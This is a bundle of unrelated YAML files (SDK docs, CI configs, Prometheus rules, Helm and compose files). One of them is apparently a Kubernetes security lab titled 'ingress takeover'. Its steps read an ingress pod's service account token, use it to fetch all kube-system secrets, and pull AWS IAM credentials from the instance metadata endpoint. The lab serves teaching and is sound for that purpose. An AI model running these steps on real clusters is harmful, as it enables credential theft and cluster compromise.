nameWithType: NicIPConfiguration.UpdateStages.WithLoadBalancer.withExistingLoadBalancerBackend(LoadBalancer loadBalancer, String backendName)
parameters:
- description: <p>an existing load balancer </p>
name: loadBalancer
type: <xref href="com.microsoft.azure.management.network.LoadBalancer?alt=com.microsoft.azure.management.network.LoadBalancer&text=LoadBalancer" data-throw-if-not-resolved="False"/>
- description: <p>the name of an existing backend on that load balancer </p>
name: backendName
type: <xref href="String?alt=String&text=String" data-throw-if-not-resolved="False"/>
returns:
description: <p>the next stage of the update </p>
type: <xref href="com.microsoft.azure.management.network.NicIPConfiguration.Update?alt=com.microsoft.azure.management.network.NicIPConfiguration.Update&text=NicIPConfiguration.Update" data-throw-if-not-resolved="False"/>
summary: <p>Specifies the load balancer to associate this IP configuration with. </p>
syntax: public Update withExistingLoadBalancerBackend(LoadBalancer loadBalancer, String backendName)
uid: com.microsoft.azure.management.network.NicIPConfiguration.UpdateStages.WithLoadBalancer.withExistingLoadBalancerBackend(LoadBalancer,String)
uid: com.microsoft.azure.management.network.NicIPConfiguration.UpdateStages.WithLoadBalancer.withExistingLoadBalancerBackend*
fullName: com.microsoft.azure.management.network.NicIPConfiguration.UpdateStages.WithLoadBalancer.withExistingLoadBalancerBackend
name: withExistingLoadBalancerBackend(LoadBalancer loadBalancer, String backendName)
package: com.microsoft.azure.management.network
metadata: {}
|
legacy/docs-ref-autogen/com.microsoft.azure.management.network.NicIPConfiguration.UpdateStages.WithLoadBalancer.withExistingLoadBalancerBackend.yml
|
name: step01
description: deploy nginx ingeress controller to the cluster
command: kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/controller-v0.40.2/deploy/static/provider/aws/deploy.yaml
name: step02
description: set the ingress pod name as an env var
command: POD_NAME=$(kubectl get pods -n ingress-nginx --field-selector status.phase=Running -o json | jq -r '.items[].metadata.name')
name: step03
description: validate list all secrets in the ingress cluster role
command: kubectl get clusterroles ingress-nginx --all-namespaces -o=yaml
name: step04
description: demonstrate how list all secrets is with the admin kubeconfig
command: kubectl get secrets --all-namespaces -o=yaml
name: step05
description: filter the secrets owned by service accounts
command: kubectl get secrets --all-namespaces -o=json | jq '.items[].metadata.annotations' | grep 'service-account.name'
name: step06
description: set the ingress nginx as an env var
command: NAMESPACE=ingress-nginx
name: step07
description: set the ingress token as an env var
command: TOKEN=$(kubectl exec $POD_NAME -n $NAMESPACE -- cat /var/run/secrets/kubernetes.io/serviceaccount/token)
name: step08
description: find the kubernetes api server
command: kubectl exec $POD_NAME -n $NAMESPACE -- netstat | grep kubernetes
name: step09
description: set the api server address as an env var, should be fqdn
command: API_SERVER=<REPLACE WITH OUTPUT FROM STEP08>
name: step10
description: test connectivity to the api server from within the pod
command: kubectl exec $POD_NAME -n $NAMESPACE -- curl https://$API_SERVER/api --header "Authorization: Bearer $TOKEN" --insecure
name: step11
description: get all kube-system secrets from within the pod using the ingress token
command: kubectl exec $POD_NAME -n $NAMESPACE -- curl https://$API_SERVER/api/v1/namespaces/kube-system/secrets --header "Authorization: Bearer $TOKEN" --insecure
name: step12
description: test egress internet connectivity
command: kubectl exec $POD_NAME -n $NAMESPACE -- curl https://ipinfo.io/json
name: step13
description: set the aws node name as an env var
command: NODE=$(kubectl exec $POD_NAME -n $NAMESPACE -- curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
name: step14
description: set the metadata token as an env ver in one liner
command: NODE=$(kubectl exec $POD_NAME -n $NAMESPACE -- curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/) && METADATA_TOKEN=$(kubectl exec $POD_NAME -n $NAMESPACE -- curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$NODE)
|
labs/lab01-ingress_takeover/lab01-ingress_takeover.yaml
|
---
apiVersion: monitoring.coreos.com/v1
kind: PrometheusRule
metadata:
labels:
prometheus: k8s
role: alert-rules
name: es-rules
namespace: logging
spec:
groups:
- name: es.rules
rules:
- alert: ElasticClusterRed
expr: elasticsearch_cluster_health_status{color="red"} == 1
for: 30m
labels:
severity: critical
annotations:
message: 'Elastic Cluster status is Red, cluster: {{ $labels.cluster }})'
doc: "Elastic Cluster status is Red in the last 30 minutes."
- alert: ElasticClusterYellow
expr: elasticsearch_cluster_health_status{color="yellow"} == 1
for: 30m
labels:
severity: warning
annotations:
message: 'Elastic Cluster status is Yellow, cluster: {{ $labels.cluster }})'
doc: "Elastic Cluster status is Yellow in the last 30 minutes."
- alert: ElasticNumberOfRelocationShards
expr: elasticsearch_cluster_health_relocating_shards > 0
for: 30m
labels:
severity: warning
annotations:
message: 'Number of relocationg shards in the last 30 min: {{ $value }} in the cluster: {{ $labels.cluster }}'
doc: "Number of relocation shards for 30 min"
- alert: ElasticNumberOfInitializingShards
expr: elasticsearch_cluster_health_initializing_shards > 0
for: 30m
labels:
severity: warning
annotations:
message: 'Number of initializing shards in the last 30 min: {{ $value }} in the cluster: {{ $labels.cluster }}'
doc: "Number of initializing shards in the last 30 min."
- alert: ElasticNumberOfUnassignedShards
expr: elasticsearch_cluster_health_unassigned_shards > 0
for: 30m
labels:
severity: warning
annotations:
message: 'Number of unassigned shards in the last 30 min: {{ $value }} in the cluster: {{ $labels.cluster }}'
doc: "Number of unassigned shards in the last 30 min."
- alert: ElasticNumberOfPendingTasks
expr: elasticsearch_cluster_health_number_of_pending_tasks > 0
for: 30m
labels:
severity: warning
annotations:
message: 'Number of pending tasks in the last 30 min: {{ $value }} in the cluster: {{ $labels.cluster }}'
doc: "Number of pending tasks in the last 30 min."
|
katalog/elasticsearch-single/rules.yml
|
jobs:
include:
- language: node_js
node_js:
- 12
env:
- DOCKER_COMPOSE_VERSION=1.29.2
install:
- sudo rm /usr/local/bin/docker-compose
- curl -L https://github.com/docker/compose/releases/download/${DOCKER_COMPOSE_VERSION}/docker-compose-`uname -s`-`uname -m` > docker-compose
- chmod +x docker-compose
- sudo mv docker-compose /usr/local/bin
- npm install -g newman
- sudo ln -s /home/travis/.nvm/versions/node/$(node -v)/bin/newman /usr/local/bin/newman
script:
- cd images/wai-openresty/tests
- ./test.sh
- language: python
python:
- "3.8"
addons:
mariadb: "10.4"
before_install:
- sudo mysql -e 'CREATE DATABASE IF NOT EXISTS test;'
install:
- curl -sLo terraform.zip https://releases.hashicorp.com/terraform/0.12.20/terraform_0.12.20_linux_amd64.zip
- unzip terraform.zip
- sudo mv terraform /usr/local/bin
- rm terraform.zip
- curl -sLo kubeval.tar.gz https://github.com/instrumenta/kubeval/releases/latest/download/kubeval-linux-amd64.tar.gz
- tar xf kubeval.tar.gz
- sudo mv kubeval /usr/local/bin
- pip install -r requirements.txt
- ansible-galaxy install -r playbooks/requirements.yml
- ansible-galaxy collection install -r playbooks/requirements-collection.yml
- git clone --branch v2.12.0 https://github.com/kubernetes-sigs/kubespray.git playbooks/kubespray
script:
- ssh-keygen -t rsa -b 4096 -N '' -f ssh_wai_key
- pwd
- cd infrastructure
- terraform init -backend=false -no-color
- terraform validate -no-color
- cd ..
- ansible-playbook playbooks/wai.yml -i playbooks/inventory/30-localhost --syntax-check
- ansible-playbook playbooks/wai.yml -i playbooks/inventory/30-localhost -t templates
- kubeval playbooks/compiled-templates/k8s/*.yml
- kubeval playbooks/compiled-templates/k8s/**/*.yml
- cat playbooks/compiled-templates/db/*.sql | sudo mysql test -v
- cat playbooks/compiled-templates/db/**/*.sql | sudo mysql test -v
|
.travis.yml
|
documentType: LandingData
title: Integration von Entwicklertools
metadata:
title: Integration von Entwicklertools
meta.description: from-team
services: from-team
author:
manager: from-team
layout: LandingPage
ms.assetid:
ms.service: from-team
ms.tgt_pltfrm: from-team
ms.devlang: from-team
ms.topic: landing-page
ms.date: 09/15/2017
ms.author: from-team
ms.openlocfilehash: 8ed2db241ae79b549f96581b67625114fd658c67
ms.sourcegitcommit: c47ef7899572bf6441627f76eb4c4ac15e487aec
ms.translationtype: HT
ms.contentlocale: de-DE
ms.lasthandoff: 05/04/2018
ms.locfileid: "33206041"
abstract:
description:
sections:
- title:
items:
- type: list
style: cards
className: cardsA
items:
- html: <a href="/java/azure/intellij/azure-toolkit-for-intellij"> <img height="48" width="48" src="https://docs.microsoft.com/media/logos/logo_intellij.svg" alt=""> <br><b>IntelliJ</b></a> <p>Das Azure-Toolkit für IntelliJ stellt Vorlagen und Funktionen bereit, mit denen Sie Azure-Anwendungen mithilfe der IntelliJ-IDE-Entwicklungsumgebung einfach erstellen, entwickeln, testen und bereitstellen können.</p>
- html: <a href="/java/azure/spring-framework/deploy-spring-boot-java-app-with-maven-plugin"> <img height="48" width="48" src="https://docs.microsoft.com/media/logos/logo_maven.svg" alt=""> <br><b>Maven</b></a> <p>Das Maven-Plug-In für Azure-Web-Apps für Apache Maven ermöglicht die nahtlose Integration von Azure App Service in Maven-Projekte und optimiert für Entwickler den Bereitstellungsprozess für Web-Apps in Azure App Service.</p>
- html: <a href="/java/azure/eclipse/azure-toolkit-for-eclipse"> <img height="48" width="48" src="https://docs.microsoft.com/media/logos/logo_eclipse.svg" alt=""> <br><b>Eclipse</b></a> <p>Das Azure-Toolkit für Eclipse stellt Vorlagen und Funktionen bereit, mit denen Sie Cloudanwendungen mithilfe der Eclipse-IDE-Entwicklungsumgebung (Integrated Development Environment; integrierte Entwicklungsumgebung) einfach in Azure erstellen, entwickeln, testen und bereitstellen können.</p>
- html: <a href="/azure/ansible/"> <img height="48" width="48" src="../media/index/ansible.svg" alt=""> <br><b>Ansible</b></a> <p>Automatisieren von Cloudbereitstellung, Konfigurationsverwaltung und Anwendungsbereitstellungen</p>
- html: <a href="/azure/jenkins/"> <img height="48" width="48" src="https://docs.microsoft.com/media/logos/logo_jenkins.svg" alt=""> <br><b>Jenkins</b></a> <p>Erstellen von Apps in der Cloud und Bereitstellen der Apps in Azure</p>
- html: <a href="/azure/terraform/"> <img height="48" width="48" src="../media/index/terraform.png" alt=""> <br><b>Terraform</b></a> <p>Zuverlässige Versionsverwaltung und Erstellung von Infrastrukturen in Azure</p>
|
articles/integrations/index.yml
|
principais:
- relevance: 'lead'
cls: 'xs12 xl6'
rowClass: "pt-0 px-3 pb-5"
api:
template: "/estadicmunic?categorias=cd_indicador_spai-cd_indicador,ds_fonte,nu_ano_indicador-nu_competencia,spai_vl_indicador_txt&filtros=eq-cd_mun_ibge-{0},and,eq-cd_indicador_spai-'MUNIC_NMDHU542',and,eq-nu_ano_indicador-nu_ano_indicador_max"
args:
- named_prop: "idLocalidade"
args:
- prop: "value"
named_prop: 'spai_vl_indicador_txt'
default: "Sem Registros"
- prop: "description"
fixed: 'Existência de Comitê gestor para o enfrentamento e erradicação do sub-registro de nascimento e a ampliação do acesso à documentação básica'
- prop: 'comment'
template: "({0}, {1})"
args:
- named_prop: "ds_fonte"
- named_prop: "nu_competencia"
- relevance: 'lead'
cls: 'xs12 xl6'
rowClass: "pt-0 px-3 pb-5"
api:
template: "/estadicmunic?categorias=cd_indicador_spai-cd_indicador,ds_fonte,nu_ano_indicador-nu_competencia,spai_vl_indicador_txt&filtros=eq-cd_mun_ibge-{0},and,eq-cd_indicador_spai-'MUNIC_NMDHU575',and,eq-nu_ano_indicador-nu_ano_indicador_max"
args:
- named_prop: "idLocalidade"
args:
- prop: "value"
named_prop: 'spai_vl_indicador_txt'
default: "Sem Registros"
- prop: "description"
fixed: 'Existência de enfrentamento ao sub-registro civil de nascimento e emissão de documentação básica'
- prop: 'comment'
template: "({0}, {1})"
args:
- named_prop: "ds_fonte"
- named_prop: "nu_competencia"
- relevance: 'lead'
cls: 'xs12 xl6'
rowClass: "pt-0 px-3 pb-5"
api:
template: "/estadicmunic?categorias=cd_indicador_spai-cd_indicador,ds_fonte,nu_ano_indicador-nu_competencia,spai_vl_indicador_txt&filtros=eq-cd_mun_ibge-{0},and,eq-cd_indicador_spai-'MUNIC_NMSAU53',and,eq-nu_ano_indicador-nu_ano_indicador_max"
args:
- named_prop: "idLocalidade"
args:
- prop: "value"
named_prop: 'spai_vl_indicador_txt'
default: "Sem Registros"
- prop: "description"
fixed: 'Existência de busca ativa dos casos de nascidos vivos não registrados para promover o registro civil de nascimento'
- prop: 'comment'
template: "({0}, {1})"
args:
- named_prop: "ds_fonte"
- named_prop: "nu_competencia"
# ========================================================
secoes:
- id: "regcivil_unico"
name: ""
cards:
# ========================================================
- id: "map_comite_subregistro"
title:
fixed: "Comitê gestor para o enfrentamento e erradicação do sub-registro de nascimento e a ampliação do acesso à documentação básica"
card_template: "t5"
datasource: "estadicmunic"
cd_indicador: "MUNIC_NMDHU542"
# ========================================================
- id: "map_enfrentamento_subregistro"
title:
fixed: "Enfrentamento ao sub-registro civil de nascimento e emissão de documentação básica"
card_template: "t5"
datasource: "estadicmunic"
cd_indicador: "MUNIC_NMDHU575"
# ========================================================
- id: "map_busca_nascidos"
title:
fixed: "Busca ativa dos casos de nascidos vivos não registrados para promover o registro civil de nascimento"
card_template: "t5"
datasource: "estadicmunic"
cd_indicador: "MUNIC_NMSAU53"
# ========================================================
- id: "map_comite_subregistro_orcamento_proprio"
title:
fixed: "Existe no município Comitê Gestor para o enfrentamento e erradicação de sub-registro civil de nascimento - Dotação orçamentária própria"
card_template: "t5"
datasource: "estadicmunic"
cd_indicador: "MUNIC_NMSUB08"
# ========================================================
- id: "map_enfrentamento_subregistro_orcamento_proprio"
title:
fixed: "Enfrentamento ao sub-registro civil de nascimento e emissão de documentação básica, com dotação orçamentária própria"
card_template: "t5"
datasource: "estadicmunic"
cd_indicador: "MUNIC_NMSUB09"
|
br/observatorio/des/localidade/municipio/regcivil.yaml
|
title: Your awesome title
name: <NAME>'s Website
email: &email <EMAIL>
description: >- # this means to ignore newlines until "baseurl:"
Write an awesome description for your new site here. You can edit this
line in _config.yml. It will appear in your document head meta (for
Google search results) and in your feed.xml site description.
baseurl: "" # the subpath of your site, e.g. /blog
url: https://www.jameseanthony.com # the base hostname & protocol for your site, e.g. http://example.com (Used for Sitemap.xml and RSS feed)
# Includes an icon in the footer for each username you enter
footer-links:
email: *email
github: jamesant
linkedin: jameseanthony
rss: yes
twitter: JamesAn34127990
stackoverflow: # your stackoverflow profile, e.g. "users/50476/bart-kiers"
# Enter your Disqus shortname (not your username) to enable commenting on posts
# You can find your shortname on the Settings page of your Disqus account
disqus:
# Build settings
#theme: minima
plugins:
- jekyll-feed
- jekyll-sitemap # Create a sitemap using the official Jekyll sitemap gem
# Jekyll 3 now only supports Kramdown for Markdown
kramdown:
# Use GitHub flavored markdown, including triple backtick fenced code blocks
input: GFM
# Jekyll 3 and GitHub Pages now only support rouge for syntax highlighting
syntax_highlighter: rouge
syntax_highlighter_opts:
# Use existing pygments syntax highlighting css
css_class: 'highlight'
# Set the Sass partials directory, as we're using @imports
sass:
style: :expanded # You might prefer to minify using :compressed
# Use the following plug-ins
plugins:
- jekyll-sitemap # Create a sitemap using the official Jekyll sitemap gem
- jekyll-feed # Create an Atom feed using the official Jekyll feed gem
# Exclude from processing.
# The following items will not be processed, by default.
# Any item listed under the `exclude:` key here will be automatically added to
# the internal "default list".
#
# Excluded items can be processed by explicitly listing the directories or
# their entries' file path in the `include:` list.
#
exclude:
- LICENSE
- README.md
- CNAME
# - .sass-cache/
# - .jekyll-cache/
# - gemfiles/
# - Gemfile
# - Gemfile.lock
# - node_modules/
# - vendor/bundle/
# - vendor/cache/
# - vendor/gems/
# - vendor/ruby/
|
_config.yml
|
---
apiVersion: monitoring.coreos.com/v1
kind: ServiceMonitor
metadata:
name: kubelet
namespace: d8-monitoring
{{- include "helm_lib_module_labels" (list . (dict "prometheus" "main")) | nindent 2 }}
spec:
jobLabel: k8s-app
endpoints:
# API metrics
- port: https-metrics
scheme: https
bearerTokenFile: /var/run/secrets/kubernetes.io/serviceaccount/token
tlsConfig:
insecureSkipVerify: true
honorLabels: true
relabelings:
- regex: endpoint|namespace|pod|service
action: labeldrop
- sourceLabels: [__meta_kubernetes_endpoint_address_target_name]
targetLabel: node
- targetLabel: scrape_endpoint
replacement: kubelet
- targetLabel: tier
replacement: cluster
# CRI metrics
- port: https-metrics
scheme: https
bearerTokenFile: /var/run/secrets/kubernetes.io/serviceaccount/token
tlsConfig:
insecureSkipVerify: true
path: /metrics/cadvisor
honorLabels: true
relabelings:
- regex: endpoint|namespace|pod|service
action: labeldrop
- sourceLabels: [__meta_kubernetes_endpoint_address_target_name]
targetLabel: node
- targetLabel: scrape_endpoint
replacement: cadvisor
- targetLabel: tier
replacement: cluster
metricRelabelings:
# For Containerd metrics, the `container` label is empty for pause containers, but Docker sets the POD value.
# This relabeling rule is required to keep both CRI metrics in sync.
- sourceLabels: [image, name, container]
regex: '(.+);(.+);'
action: replace
targetLabel: container
replacement: "POD"
- sourceLabels: [namespace]
regex: '^$'
action: drop
- sourceLabels: [pod]
regex: '^$'
action: drop
- sourceLabels: [container]
regex: '^$'
action: drop
- regex: container_name|pod_name|id|image|name
action: labeldrop
# Probes metrics
- port: https-metrics
scheme: https
bearerTokenFile: /var/run/secrets/kubernetes.io/serviceaccount/token
tlsConfig:
insecureSkipVerify: true
path: /metrics/probes
honorLabels: true
relabelings:
- regex: endpoint|namespace|pod|service
action: labeldrop
- sourceLabels: [__meta_kubernetes_endpoint_address_target_name]
targetLabel: node
- targetLabel: scrape_endpoint
replacement: probes
- targetLabel: tier
replacement: cluster
selector:
matchLabels:
k8s-app: kubelet
namespaceSelector:
matchNames:
- d8-monitoring
|
modules/340-monitoring-kubernetes/templates/kubelet/service-monitor.yaml
|
namespaceOverride: {{kube_prometheus_stack.namespace | default("kube-prometheus")}}
## Configuration for alertmanager
## ref: https://prometheus.io/docs/alerting/alertmanager/
##
alertmanager:
## Settings affecting alertmanagerSpec
## ref: https://github.com/prometheus-operator/prometheus-operator/blob/master/Documentation/api.md#alertmanagerspec
##
alertmanagerSpec:
## Storage is the definition of how storage will be used by the Alertmanager instances.
## ref: https://github.com/prometheus-operator/prometheus-operator/blob/master/Documentation/user-guides/storage.md
##
storage:
volumeClaimTemplate:
spec:
storageClassName: {{kube_prometheus_stack.alertmanager.storage.storageClassName | default("gluster")}}
accessModes: ["ReadWriteOnce"]
resources:
requests:
storage: {{kube_prometheus_stack.alertmanager.storage.requestSize | default("50Gi")}}
# volumeClaimTemplate:
# spec:
# storageClassName: gluster
# accessModes: ["ReadWriteOnce"]
# resources:
# requests:
# storage: 50Gi
# selector: {}
## Deploy a Prometheus instance
##
prometheus:
prometheusSpec:
## Interval between consecutive scrapes.
## Defaults to 30s.
## ref: https://github.com/prometheus-operator/prometheus-operator/blob/release-0.44/pkg/prometheus/promcfg.go#L180-L183
##
scrapeInterval: {{kube_prometheus_stack.prometheus.scrapeInterval | default("")}}
evaluationInterval: {{kube_prometheus_stack.prometheus.evaluationInterval | default("")}}
## Prometheus StorageSpec for persistent data
## ref: https://github.com/prometheus-operator/prometheus-operator/blob/master/Documentation/user-guides/storage.md
##
storageSpec:
volumeClaimTemplate:
spec:
storageClassName: {{kube_prometheus_stack.prometheus.storage.storageClassName | default("gluster")}}
accessModes: ["ReadWriteOnce"]
resources:
requests:
storage: {{kube_prometheus_stack.prometheus.storage.requestSize | default("50Gi")}}
## Using PersistentVolumeClaim
##
# volumeClaimTemplate:
# spec:
# storageClassName: gluster
# accessModes: ["ReadWriteOnce"]
# resources:
# requests:
# storage: 50Gi
# selector: {}
{%if kube_prometheus_stack.prometheus.resources is defined %}
resources:
{{kube_prometheus_stack.prometheus.resources | to_nice_yaml | indent(6)}}
{% endif %}
grafana:
namespaceOverride: {{kube_prometheus_stack.namespace | default("kube-prometheus")}}
persistence:
enabled: true
type: pvc
storageClassName: {{kube_prometheus_stack.grafana.storage.storageClassName | default("gluster")}}
accessModes:
- ReadWriteOnce
size: {{kube_prometheus_stack.grafana.storage.requestSize | default("4Gi")}}
kube-state-metrics:
namespaceOverride: {{kube_prometheus_stack.namespace | default("kube-prometheus")}}
prometheus-node-exporter:
namespaceOverride: {{kube_prometheus_stack.namespace | default("kube-prometheus")}}
|
helm-values/kube-prometheus-stack/values.tmpl.yaml
|
sudo: false
language: cpp
matrix:
include:
- os: linux
sudo: required
services: docker
env: DOCKER_IMAGE=debian:9
- os: linux
sudo: required
services: docker
env: DOCKER_IMAGE=ubuntu:17.10
- os: linux
sudo: required
services: docker
env: DOCKER_IMAGE=ubuntu:18.04
- os: linux
sudo: required
services: docker
env: DOCKER_IMAGE=ubuntu:18.10
- os: linux
sudo: required
services: docker
env: DOCKER_IMAGE=fedora:26
- os: linux
sudo: required
services: docker
env: DOCKER_IMAGE=fedora:27
- os: linux
sudo: required
services: docker
env: DOCKER_IMAGE=fedora:28
- os: osx
osx_image: xcode7.3
- os: osx
osx_image: xcode8.3
- os: osx
osx_image: xcode9.4
before_install:
- |
if [[ "${TRAVIS_OS_NAME}" == "linux" ]]; then
docker run -d --name linux -v $(pwd):/travis $DOCKER_IMAGE tail -f /dev/null;
docker ps
fi
install:
# install dependencies in debian like systems
- |
if [[ "$DOCKER_IMAGE" == *"ubuntu"* || "$DOCKER_IMAGE" == *"debian"* ]]; then
docker exec -t linux bash -c "apt-get update &&
apt-get install -y build-essential cmake ninja-build libboost-dev"
fi
# install dependencies in red hat like systems
- |
if [[ "$DOCKER_IMAGE" == *"fedora"* ]]; then
docker exec -t linux bash -c "dnf -y group install \"Development Tools\" \"C Development Tools and Libraries\" &&
dnf -y install cmake ninja-build boost-devel"
fi
# install dependencies for macOS
- |
if [[ "${TRAVIS_OS_NAME}" == "osx" ]]; then
brew install cmake || brew upgrade cmake
brew install ninja boost@1.59
brew unlink boost && brew link --force boost@1.59
fi
script:
- |
if [[ "${TRAVIS_OS_NAME}" == "linux" ]]; then
docker exec -t linux bash -c "cd /travis;
mkdir build && cd build && cmake -G Ninja .. &&
ninja && ninja test"
fi
- |
if [[ "${TRAVIS_OS_NAME}" == "osx" ]]; then
cd "${TRAVIS_BUILD_DIR}"
mkdir build && cd build && cmake -G Ninja .. &&
ninja && ninja test
fi
|
.travis.yml
|
language: python
dist: xenial
services:
- xvfb
addons:
apt:
packages:
- herbstluftwm
- libxkbcommon-x11-0
matrix:
fast_finish: true
include:
- name: Latest Env
env:
- VARIANT=yaml
- PY_VER=3.6
- name: py3.6 Newest Tags
env:
- VARIANT=tag
- PY_VER=3.6
- name: py3.6 Master Branch
env:
- VARIANT=dev
- PY_VER=3.6
- name: py3.7 Newest Tags
env:
- VARIANT=tag
- PY_VER=3.7
- name: py3.7 Master Branch
env:
- VARIANT=dev
- PY_VER=3.7
- name: py3.8 Newest Tags
env:
- VARIANT=tag
- PY_VER=3.8
- name: py3.8 Master Branch
env:
- VARIANT=dev
- PY_VER=3.8
allow_failures:
- name: py3.6 Master Branch
env:
- VARIANT=dev
- PY_VER=3.6
- name: py3.7 Newest Tags
env:
- VARIANT=tag
- PY_VER=3.7
- name: py3.7 Master Branch
env:
- VARIANT=dev
- PY_VER=3.7
- name: py3.8 Newest Tags
env:
- VARIANT=tag
- PY_VER=3.8
- name: py3.8 Master Branch
env:
- VARIANT=dev
- PY_VER=3.8
install:
- wget https://repo.continuum.io/miniconda/Miniconda3-latest-Linux-x86_64.sh -O miniconda.sh;
- bash miniconda.sh -b -p $HOME/miniconda
- source "$HOME/miniconda/etc/profile.d/conda.sh"
- conda activate
- hash -r
# Use our condarc
- cp condarc ~/.condarc
- conda config --set always_yes yes --set changeps1 no
- conda install conda-build anaconda-client
- conda update -q conda conda-build
# Reboot conda after updating conda to avoid subtle path bugs
- conda deactivate
- conda activate
# Useful for debugging any issues with conda
- conda info -a
- |
if [ "$VARIANT" = "yaml" ]; then
# Create the environment from yaml
conda env create -q -n pcds-test -f envs/pcds/env.yaml
else
if [ "$VARIANT" = "dev" ]; then
# Add the dev channel to be first channel
conda config --add channels pcds-dev
fi
timeout 10m scripts/create_base_env.sh test pcds "$PY_VER"
fi
- conda activate pcds-test
# Check out the tests for all of our packages
- |
if [ "$VARIANT" = "dev" ]; then
python scripts/test_setup.py
else
python scripts/test_setup.py --tag
fi
# Show us which test scripts exist
- readlink -f */run_tests.py
before_script:
# Run windows manager
- "herbstluftwm &"
- sleep 1
script:
- scripts/run_all_tests.sh pcds
|
.travis.yml
|
confluence:
jmeter_comment_page: 0.03
jmeter_create_and_edit_page:create_page: 0.03
jmeter_create_and_edit_page:create_page_editor: 0.03
jmeter_create_and_edit_page:edit_page: 0.03
jmeter_create_and_edit_page:open_editor: 0.03
jmeter_create_blog:blog_editor: 0.03
jmeter_create_blog:feel_and_publish: 0.03
jmeter_like_page: 0.03
jmeter_login_and_view_dashboard: 0.03
jmeter_search_cql:recently_viewed: 0.03
jmeter_search_cql:search_results: 0.03
jmeter_upload_attachment: 0.03
jmeter_view_attachment: 0.03
jmeter_view_blog: 0.03
jmeter_view_dashboard: 0.03
jmeter_view_page:open_page: 0.03
selenium_create_comment: 0.03
selenium_create_comment:save_comment: 0.03
selenium_create_comment:write_comment: 0.05
selenium_create_page: 0.05
selenium_create_page:open_create_page_editor: 0.01
selenium_create_page:save_created_page: 0.03
selenium_edit_page: 0.03
selenium_edit_page:open_create_page_editor: 0.03
selenium_edit_page:save_edited_page: 0.03
selenium_log_out: 0.03
selenium_login: 0.03
selenium_login:login_and_view_dashboard: 0.03
selenium_login:open_login_page: 0.03
selenium_view_blog: 0.03
selenium_view_dashboard: 0.01
selenium_view_page: 0.03
jira:
jmeter_add_comment:open_comment: 0.09
jmeter_add_comment:save_comment: 0.4
jmeter_browse_boards: 0.2
jmeter_browse_projects: 0.04
jmeter_create_issue:fill_and_submit_issue_form: 0.72
jmeter_create_issue:open_quick_create: 0.15
jmeter_edit_issue:open_editor: 0.15
jmeter_edit_issue:save_edit: 0.3
jmeter_login_and_view_dashboard: 0.2
jmeter_search_jql: 0.09
jmeter_view_backlog: 0.15
jmeter_view_dashboard: 0.05
jmeter_view_issue: 0.2
jmeter_view_kanban_board: 0.15
jmeter_view_project_summary: 0.1
jmeter_view_scrum_board: 0.1
selenium_browse_boards_list: 0.04
selenium_browse_projects_list: 0.09
selenium_create_issue: 0.09
selenium_create_issue:fill_and_submit_issue_form: 0.09
selenium_create_issue:fill_and_submit_issue_form:submit_issue_form: 0.03
selenium_create_issue:open_quick_create: 0.09
selenium_edit_issue: 0.1
selenium_edit_issue:open_edit_issue_form: 0.15
selenium_edit_issue:save_edit_issue_form: 0.08
selenium_log_out: 0.5
selenium_login: 0.1
selenium_login:login_and_view_dashboard: 0.1
selenium_login:open_login_page: 0.5
selenium_project_summary: 0.09
selenium_save_comment: 0.09
selenium_save_comment:open_comment_form: 0.1
selenium_save_comment:submit_form: 0.16
selenium_search_jql: 0.1
selenium_view_dashboard: 0.15
selenium_view_issue: 0.15
selenium_view_kanban_board: 0.05
selenium_view_scrum_board: 0.04
selenium_view_scrum_board_backlog: 0.05
|
app/reports_generation/tolerances.yml
|
version: '3'
volumes:
django_pro1_iot_local_postgres_data: {}
django_pro1_iot_local_postgres_data_backups: {}
services:
django: &django
build:
context: .
dockerfile: ./compose/local/django/Dockerfile
image: django_pro1_iot_local_django
container_name: django_pro1_iot_local_django
platform: linux/x86_64
depends_on:
- postgres
- redis
volumes:
- .:/app:z
env_file:
- ./.envs/.local/.django
- ./.envs/.local/.postgres
ports:
- "8000:8000"
command: /start
postgres:
build:
context: .
dockerfile: ./compose/production/postgres/Dockerfile
image: django_pro1_iot_production_postgres
container_name: django_pro1_iot_local_postgres
volumes:
- django_pro1_iot_local_postgres_data:/var/lib/postgresql/data:Z
- django_pro1_iot_local_postgres_data_backups:/backups:z
env_file:
- ./.envs/.local/.postgres
docs:
image: django_pro1_iot_local_docs
container_name: django_pro1_iot_local_docs
platform: linux/x86_64
build:
context: .
dockerfile: ./compose/local/docs/Dockerfile
env_file:
- ./.envs/.local/.django
volumes:
- ./docs:/docs:z
- ./config:/app/config:z
- ./django_pro1_iot:/app/django_pro1_iot:z
ports:
- "9000:9000"
command: /start-docs
redis:
image: redis:6
container_name: django_pro1_iot_local_redis
celeryworker:
<<: *django
image: django_pro1_iot_local_celeryworker
container_name: django_pro1_iot_local_celeryworker
depends_on:
- redis
- postgres
ports: []
command: /start-celeryworker
celerybeat:
<<: *django
image: django_pro1_iot_local_celerybeat
container_name: django_pro1_iot_local_celerybeat
depends_on:
- redis
- postgres
ports: []
command: /start-celerybeat
flower:
<<: *django
image: django_pro1_iot_local_flower
container_name: django_pro1_iot_local_flower
ports:
- "5555:5555"
command: /start-flower
|
local.yml
|
---
- hosts: localhost
collections:
- theforeman.foreman
gather_facts: false
vars_files:
- vars/server.yml
tasks:
- name: ensure test organization
include_tasks: tasks/organization.yml
vars:
organization_name: "Test Organization"
organization_state: "present"
- include_tasks: tasks/content_view.yml
vars:
content_view_name: "cleanup-testcv"
- include_tasks: tasks/content_view.yml
vars:
content_view_name: "cleanup-testccv"
composite: true
components:
- content_view: cleanup-testcv
latest: true
- include_tasks: tasks/content_view_version.yml
vars:
content_view_name: "cleanup-testcv"
version: "{{ item }}"
loop:
- "1.0"
- "2.0"
- "3.0"
- "4.0"
- "5.0"
- include_tasks: tasks/content_view_version.yml
vars:
content_view_name: "cleanup-testccv"
version: "{{ item }}"
loop:
- "1.0"
- "2.0"
- "3.0"
- "4.0"
- "5.0"
- hosts: tests
collections:
- theforeman.foreman
gather_facts: false
vars_files:
- vars/server.yml
roles:
- role: content_view_version_cleanup
vars:
username: "{{ foreman_username }}"
password: "{{ <PASSWORD> }}"
server_url: "{{ foreman_server_url }}"
validate_certs: "{{ foreman_validate_certs }}"
organization: "Test Organization"
content_view_version_cleanup_keep: 2
content_view_version_cleanup_search: "name ~ cleanup"
post_tasks:
- name: find remaining content view versions
theforeman.foreman.resource_info:
username: "{{ foreman_username }}"
password: "{{ <PASSWORD> }}"
